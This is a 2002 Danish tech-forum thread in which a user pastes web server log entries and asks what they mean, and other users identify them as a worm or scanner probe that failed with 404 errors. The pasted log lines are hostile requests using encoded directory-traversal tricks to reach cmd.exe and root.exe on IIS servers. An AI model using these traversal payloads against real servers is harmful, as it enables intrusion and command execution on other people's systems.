Avatar billede skumpaq Nybegynder
27. august 2002 - 17:23 Der er 5 kommentarer og
3 løsninger

Er det godt mon?

Betyder det her noget godt: ?

IP - - [27/Aug/2002:08:30:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 279
IP - - [27/Aug/2002:08:30:21 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 277
IP - - [27/Aug/2002:08:30:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
IP - - [27/Aug/2002:08:30:21 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287
IP - - [27/Aug/2002:08:30:22 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
IP - - [27/Aug/2002:08:30:22 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
IP - - [27/Aug/2002:08:30:22 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
IP - - [27/Aug/2002:08:30:23 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
IP - - [27/Aug/2002:08:30:23 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
IP - - [27/Aug/2002:08:30:23 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
IP- - [27/Aug/2002:08:30:24 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
IP - - [27/Aug/2002:08:30:24 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
IP - - [27/Aug/2002:08:30:24 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
IP- - [27/Aug/2002:08:30:24 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
IP - - [27/Aug/2002:08:30:25 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
IP - - [27/Aug/2002:08:30:25 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301'

Betyder det noget godt??
Avatar billede bufferzone Praktikant
27. august 2002 - 17:26 #1
Det er en hacker/scriptkiddi der har kørt et script af mod dig, en kombineret port/vulnerability scanning. Få dig en personlig firewall f.eks. sygate fra www.sygate.com den er gratis og giver rimelig sikkerhed
Avatar billede tommyf Nybegynder
27. august 2002 - 17:26 #2
Et angreb fra Codered. Men virusen er kun rettet mod IIS saavidt jeg husker, saa du har ikke meget at frygte.
Avatar billede danielks Nybegynder
27. august 2002 - 17:28 #3
Du har sikkert alerede en firewall, med de kommandoer jeg kan se i denne fil... Den skader ikke, og hvis du ikke har en firewall er angrebet stadig slået i stykker (404)
Avatar billede skumpaq Nybegynder
27. august 2002 - 17:36 #4
bufferzone: Hmmm... Jeg kører med Hardware firewall i min router, og med ZoneAlarm som software firewall...
Avatar billede danielks Nybegynder
27. august 2002 - 17:37 #5
Ja netop... Den har blot smadret hacker angrebet, og kørt en "details"
Avatar billede skumpaq Nybegynder
27. august 2002 - 17:41 #6
Okey, men eftersom i alle tre har svaret på spørgsmålet giver jeg jer 10 point hver! :)
Det er vidst rimeligt! :)
Avatar billede danielks Nybegynder
27. august 2002 - 17:42 #7
K, tak...
Avatar billede thomasledet Nybegynder
28. august 2002 - 13:54 #8
det er ikke en hacker eller scriptkiddie (med 99,99995% sikkerhed) og det hjælper heller ikke meget at have en firewall, når det drejer sig om sådanne angreb.... tommyf har ret - det er med meget stor sansynlighed "bare" codered-virusen, der er på spil...

danielks> en firewall er ikke en magisk ting... i det øjeblik du har installeret en webserver og giver den "udgangstilladelse" i din firewall, så mister firewallen sin "magt" over denne port og webserveren. Dermed er webserveren et hul igennem firewallen og om du har en firewall eller ej gør ingen forskel... i hvert fald ikke, når det drejer sig om ovennævte typer angreb.
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester